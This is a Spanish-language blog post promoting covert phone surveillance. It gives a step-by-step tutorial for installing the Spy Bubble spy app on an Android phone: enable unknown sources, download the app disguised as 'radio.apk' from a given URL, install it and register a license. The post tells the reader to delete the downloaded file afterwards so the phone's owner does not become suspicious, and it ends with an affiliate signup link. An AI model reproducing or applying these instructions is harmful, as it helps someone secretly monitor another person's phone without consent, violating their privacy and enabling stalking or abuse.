Como espiar celulares por internet

Recursos, trucos y aplicaciones para espiar celulares por internet

Tutorial paso a paso de instalación de Spy Bubble en Android

Este tutorial te mostrara lo fácil que es espiar un celular android con tan solo instalar la aplicación, recuerda que debes seleccionar la opción “permitir la instalación de aplicaciones que no sean del Market” para que la instalación se pueda completar. Ya habíamos visto que es spy bubble sin embargo es importante que conozcas el procedimiento exacto de instalación de spy bubble y las precauciones que debes tomar para no dejar evidencia de la aplicación.

Por ejemplo, es importante que al finalizar la instalación de la aplicación borres el archivo de la carpeta de descargas para no levantar sospechas.

Sin mas por el momento te adjunto el tutorial.

Tutorial en español de instalación de Spy bubble.

Resumen de instrucciones:

  1. Aplicacion Spy bubble para espia de celularesPresiona la tecla “Inicio” en tu Android. Selecciona “Configuraciones” y luego “Aplicaciones”. Habilita la casilla de verificación “Fuentes desconocidas”.
  2. Presiona la tecla “Inicio” nuevamente y navega al mercado. Presiona “Menú” y luego elige “Buscar”. Busca la aplicación gratuita “apkInstaller”.
  3. Resalta y selecciona “apkInstaller”. Haz clic en “Instalar” que se encuentra en la parte inferior de la pantalla. Haz clic en “OK” una vez que la aplicación se haya instalado exitosamente.
  4. Abre el explorador web en tu teléfono y escribe “http://www.spybubble.com/android/radio.apk” en la barra de direcciones. Haz clic en “Ir”, y el archivo de la aplicación será almacenado en el teléfono.
  5. Presiona “Inicio”. Abre la aplicación ApkInstaller. Desplázate al directorio “Descargar” de la sdcard, luego selecciona “radio.apk” y haz clic en “Instalar”. Elige “Instalador del paquete” para instalar la aplicación.
  6. “Apaga” el teléfono una vez que Spy Bubble haya sido instalado con éxito, y luego “Enciéndelo” para reiniciar. Aparecerá la ventana “Términos y condiciones”. Haz clic en “Acepto”. Escribe tu clave de licencia y haz clic en “Enviar”.

Registrate en Spy bubble desde: http://EspiarLlamadas.com

98 comentarios en “Tutorial paso a paso de instalación de Spy Bubble en Android”


Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Canales: , , , , , ,